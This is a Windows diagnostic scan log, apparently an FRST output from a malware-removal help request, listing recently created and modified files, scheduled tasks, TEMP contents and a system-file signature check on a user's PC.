C:\Windows\system32\wintrust.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2014-10-14 22:52 - 2014-07-06 18:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe 2014-10-14 22:52 - 2014-07-06 18:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe 2014-10-14 22:52 - 2014-07-06 18:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll 2014-10-14 22:52 - 2014-07-06 18:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx 2014-10-14 22:52 - 2014-07-06 18:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll 2014-10-14 22:52 - 2014-07-06 18:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL 2014-10-14 22:52 - 2014-07-06 18:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe 2014-10-14 22:52 - 2014-07-06 18:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll 2014-10-14 22:52 - 2014-07-06 17:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys 2014-10-14 22:52 - 2014-07-06 17:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll 2014-10-14 22:52 - 2014-07-06 17:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx 2014-10-14 22:52 - 2014-07-06 17:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll 2014-10-14 22:52 - 2014-07-06 17:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL 2014-10-14 22:52 - 2014-07-06 17:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe 2014-10-14 22:52 - 2014-07-06 17:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe 2014-10-14 22:52 - 2014-07-06 17:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe 2014-10-14 22:52 - 2014-07-06 17:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe 2014-10-14 22:52 - 2014-07-06 17:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll 2014-10-14 22:52 - 2014-06-27 16:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe 2014-10-14 22:52 - 2014-06-27 16:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe 2014-10-14 22:52 - 2014-06-27 16:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll 2014-10-14 22:52 - 2014-06-18 14:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll 2014-10-14 22:52 - 2014-06-18 14:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll 2014-10-14 22:52 - 2014-06-18 14:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll 2014-10-14 22:52 - 2014-06-18 14:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll 2014-10-14 22:52 - 2014-06-18 14:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll 2014-10-14 22:52 - 2014-06-18 14:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll 2014-10-14 22:51 - 2014-10-09 18:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2014-10-14 22:51 - 2014-10-09 18:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll 2014-10-14 22:51 - 2014-10-09 18:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2014-10-14 22:51 - 2014-10-06 18:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2014-10-14 22:51 - 2014-10-06 18:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2014-10-14 22:51 - 2014-09-25 14:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-10-14 22:51 - 2014-09-25 14:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2014-10-14 22:51 - 2014-09-25 14:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2014-10-14 22:51 - 2014-09-25 14:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2014-10-14 22:51 - 2014-09-25 14:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2014-10-14 22:51 - 2014-09-25 14:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2014-10-14 22:51 - 2014-09-25 14:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-10-14 22:51 - 2014-09-18 18:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-10-14 22:51 - 2014-09-18 17:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-10-14 22:51 - 2014-09-18 17:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2014-10-14 22:51 - 2014-09-18 17:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2014-10-14 22:51 - 2014-09-18 17:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-10-14 22:51 - 2014-09-18 17:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-10-14 22:51 - 2014-09-18 17:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2014-10-14 22:51 - 2014-09-18 17:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2014-10-14 22:51 - 2014-09-18 17:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2014-10-14 22:51 - 2014-09-18 17:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-10-14 22:51 - 2014-09-18 17:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-10-14 22:51 - 2014-09-18 17:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2014-10-14 22:51 - 2014-09-18 17:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-10-14 22:51 - 2014-09-18 17:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-10-14 22:51 - 2014-09-18 17:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2014-10-14 22:51 - 2014-09-18 17:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2014-10-14 22:51 - 2014-09-18 17:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2014-10-14 22:51 - 2014-09-18 17:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2014-10-14 22:51 - 2014-09-18 17:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2014-10-14 22:51 - 2014-09-18 17:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-10-14 22:51 - 2014-09-18 17:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2014-10-14 22:51 - 2014-09-18 17:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2014-10-14 22:51 - 2014-09-18 17:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2014-10-14 22:51 - 2014-09-18 17:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2014-10-14 22:51 - 2014-09-18 17:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll 2014-10-14 22:51 - 2014-09-18 17:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-10-14 22:51 - 2014-09-18 16:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2014-10-14 22:51 - 2014-09-18 16:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-10-14 22:51 - 2014-09-18 16:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2014-10-14 22:51 - 2014-09-18 16:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2014-10-14 22:51 - 2014-09-18 16:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2014-10-14 22:51 - 2014-09-18 16:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2014-10-14 22:51 - 2014-09-18 16:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2014-10-14 22:51 - 2014-09-18 16:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2014-10-14 22:51 - 2014-09-18 16:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-10-14 22:51 - 2014-09-18 16:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2014-10-14 22:51 - 2014-09-18 16:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2014-10-14 22:51 - 2014-09-18 16:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2014-10-14 22:51 - 2014-09-18 16:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-10-14 22:51 - 2014-09-18 16:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2014-10-14 22:51 - 2014-09-18 16:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2014-10-14 22:51 - 2014-09-18 16:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2014-10-14 22:51 - 2014-09-18 16:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-10-14 22:51 - 2014-09-18 15:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2014-10-14 22:51 - 2014-09-18 15:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2014-10-14 22:51 - 2014-09-18 15:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2014-10-14 22:51 - 2014-09-18 15:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2014-10-14 22:51 - 2014-09-17 18:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll 2014-10-14 22:51 - 2014-09-17 17:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe 2014-10-14 22:51 - 2014-07-16 18:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe 2014-10-14 22:51 - 2014-07-16 18:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2014-10-14 22:51 - 2014-07-16 17:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll 2014-10-14 22:51 - 2014-07-16 17:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll 2014-10-14 22:51 - 2014-07-16 17:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe 2014-10-14 22:51 - 2014-07-16 17:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll 2014-10-14 22:51 - 2014-07-16 17:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2014-10-14 22:51 - 2014-07-16 17:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2014-10-14 22:51 - 2014-07-16 17:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys 2014-10-14 22:51 - 2014-07-16 17:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys 2014-10-14 22:50 - 2014-09-12 17:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 2014-10-14 22:50 - 2014-09-12 17:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll 2014-10-14 22:50 - 2014-09-03 21:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll 2014-10-14 22:50 - 2014-09-03 21:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll 2014-10-13 07:47 - 2014-10-13 07:47 - 01652435 _____ () C:\Users\Ryan\Downloads\Files(1).zip ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-12 16:18 - 2013-01-17 14:19 - 00000000 __HDC () C:\ProgramData\~1 2014-11-12 16:17 - 2011-05-23 10:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments 2014-11-12 16:16 - 2013-05-25 12:16 - 00000000 __HDC () C:\ProgramData\~0 2014-11-12 16:15 - 2013-06-02 10:37 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line 2014-11-12 16:15 - 2013-06-02 10:37 - 00000000 ____D () C:\Program Files (x86)\Image-Line 2014-11-12 16:15 - 2012-01-27 16:29 - 00000000 ____D () C:\Program Files\Native Instruments 2014-11-12 16:13 - 2013-10-25 14:12 - 00000000 ____D () C:\ProgramData\Camel Audio 2014-11-12 16:13 - 2013-10-25 14:12 - 00000000 ____D () C:\Program Files (x86)\Camel Audio 2014-11-12 16:13 - 2013-10-18 16:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Camel Audio 2014-11-12 16:12 - 2011-09-14 21:32 - 00000000 ____D () C:\Program Files (x86)\Google 2014-11-12 16:06 - 2011-09-14 21:32 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-11-12 15:52 - 2012-11-16 20:30 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Skype 2014-11-12 15:50 - 2010-06-24 19:21 - 00000000 ____D () C:\Users\Ryan\AppData\Local\CrashDumps 2014-11-12 15:46 - 2014-04-07 08:59 - 00000536 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3275123363-4289498944-2812251985-1000.job 2014-11-12 15:26 - 2012-04-04 08:18 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2014-11-12 15:02 - 2009-07-13 20:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-11-12 15:02 - 2009-07-13 20:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-11-12 14:59 - 2010-02-26 06:30 - 01777953 _____ () C:\Windows\WindowsUpdate.log 2014-11-12 14:55 - 2012-05-18 16:13 - 00000000 ___RD () C:\Users\Ryan\Dropbox 2014-11-12 14:55 - 2012-05-18 16:10 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Dropbox 2014-11-12 14:54 - 2013-12-12 17:00 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Spotify 2014-11-12 14:51 - 2010-01-15 09:10 - 02397924 _____ () C:\Windows\PFRO.log 2014-11-12 14:51 - 2009-07-13 21:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-11-12 14:51 - 2009-07-13 20:51 - 00043030 _____ () C:\Windows\setupact.log 2014-11-12 11:18 - 2014-02-14 16:54 - 00000000 ____D () C:\Users\Ryan\Desktop\Pics 2014-11-12 08:09 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\Speech 2014-11-12 03:37 - 2010-04-03 16:55 - 00000000 ____D () C:\Program Files (x86)\QuickBooks Online Backup 2014-11-11 17:47 - 2014-09-27 15:37 - 00000000 ____D () C:\Users\Ryan\AppData\Local\NPE 2014-11-11 17:26 - 2014-09-27 15:39 - 00000000 ____D () C:\NPE 2014-11-11 16:48 - 2010-03-20 12:07 - 00003918 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{27FAE3BD-BE82-405C-8E7D-DB50733813FF} 2014-11-11 13:26 - 2012-04-04 08:18 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2014-11-11 13:26 - 2012-04-04 08:18 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater 2014-11-11 13:26 - 2011-05-23 18:06 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2014-11-11 10:38 - 2014-08-14 07:50 - 04246016 ___SH () C:\Users\Ryan\Desktop\Thumbs.db 2014-11-11 10:19 - 2014-08-21 13:42 - 00003180 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForRyan 2014-11-11 10:19 - 2014-08-21 13:42 - 00000328 _____ () C:\Windows\Tasks\HPCeeScheduleForRyan.job 2014-11-11 08:53 - 2014-07-22 18:01 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service 2014-11-11 08:44 - 2013-12-12 17:00 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Spotify 2014-11-09 01:22 - 2014-04-07 08:59 - 00003562 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3275123363-4289498944-2812251985-1000 2014-11-08 22:23 - 2013-08-22 20:28 - 578582455 _____ () C:\Windows\MEMORY.DMP 2014-11-08 22:23 - 2013-08-22 20:28 - 00000000 ____D () C:\Windows\Minidump 2014-11-07 08:16 - 2010-03-23 11:17 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Adobe 2014-11-07 08:06 - 2010-03-23 11:56 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Apple Computer 2014-11-06 14:56 - 2010-04-04 15:46 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log 2014-11-05 12:20 - 2009-07-13 21:13 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-11-04 14:03 - 2014-08-26 08:03 - 00002515 _____ () C:\Users\Public\Desktop\Skype.lnk 2014-11-04 14:03 - 2014-08-26 08:03 - 00000000 ___RD () C:\Program Files (x86)\Skype 2014-11-04 14:03 - 2012-11-16 20:30 - 00000000 ____D () C:\ProgramData\Skype 2014-11-04 11:22 - 2013-05-19 16:04 - 00000000 ____D () C:\Users\Ryan\.thinkorswim 2014-11-04 11:22 - 2010-05-10 07:52 - 00000000 ____D () C:\Program Files (x86)\thinkorswim 2014-11-03 14:45 - 2012-06-01 17:36 - 04150784 ___SH () C:\Users\Ryan\Downloads\Thumbs.db 2014-11-03 13:40 - 2010-03-20 15:18 - 00000000 ____D () C:\Users\Ryan\Tracing 2014-11-03 12:59 - 2010-03-23 11:54 - 00000000 ____D () C:\Program Files\Common Files\Apple 2014-11-03 12:58 - 2013-03-15 14:48 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69 2014-11-03 12:10 - 2011-05-23 17:52 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Windows Live 2014-11-03 12:09 - 2011-05-23 17:56 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live 2014-11-03 12:08 - 2012-11-17 11:26 - 00001376 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk 2014-11-03 12:07 - 2011-05-23 17:55 - 00001460 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Mail.lnk 2014-11-03 12:07 - 2010-01-15 09:44 - 00000000 ____D () C:\Program Files (x86)\Windows Live 2014-11-03 12:06 - 2012-11-17 11:25 - 00000000 ____D () C:\Program Files\Windows Live 2014-11-03 12:04 - 2010-01-15 09:48 - 00033369 _____ () C:\Windows\DirectX.log 2014-11-03 10:49 - 2010-03-19 14:58 - 00000000 ____D () C:\Users\Ryan 2014-11-03 09:49 - 2010-03-23 11:54 - 00000000 ____D () C:\ProgramData\Apple 2014-10-31 09:09 - 2010-03-20 12:25 - 00000544 _____ () C:\Windows\Tasks\PCDRScheduledMaintenance.job 2014-10-29 01:09 - 2013-06-06 16:09 - 00002185 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-10-28 19:09 - 2011-11-10 12:57 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt 2014-10-21 16:01 - 2011-09-14 21:32 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-10-21 16:01 - 2011-09-14 21:32 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-10-21 16:01 - 2011-09-14 21:32 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-10-16 15:14 - 2012-06-18 21:32 - 00000000 ____D () C:\Program Files (x86)\ATT-SST 2014-10-15 07:27 - 2009-07-13 21:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD 2014-10-15 03:24 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\rescache 2014-10-15 02:46 - 2009-07-13 20:45 - 04981328 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-10-15 02:43 - 2014-05-06 14:15 - 00000000 ___SD () C:\Windows\system32\CompatTel 2014-10-15 02:43 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism 2014-10-15 02:43 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\system32\Dism 2014-10-15 02:20 - 2010-03-23 11:06 - 00000000 ____D () C:\ProgramData\Microsoft Help 2014-10-15 02:15 - 2013-08-14 02:02 - 00000000 ____D () C:\Windows\system32\MRT 2014-10-15 02:01 - 2010-03-20 12:19 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe Some content of TEMP: ==================== C:\Users\Ryan\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpxsol3s.dll C:\Users\Ryan\AppData\Local\Temp\ICReinstall_Free_Download_Setup(1).exe C:\Users\Ryan\AppData\Local\Temp\ose00000.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-11-05 00:31 ==================== End Of Log ============================ 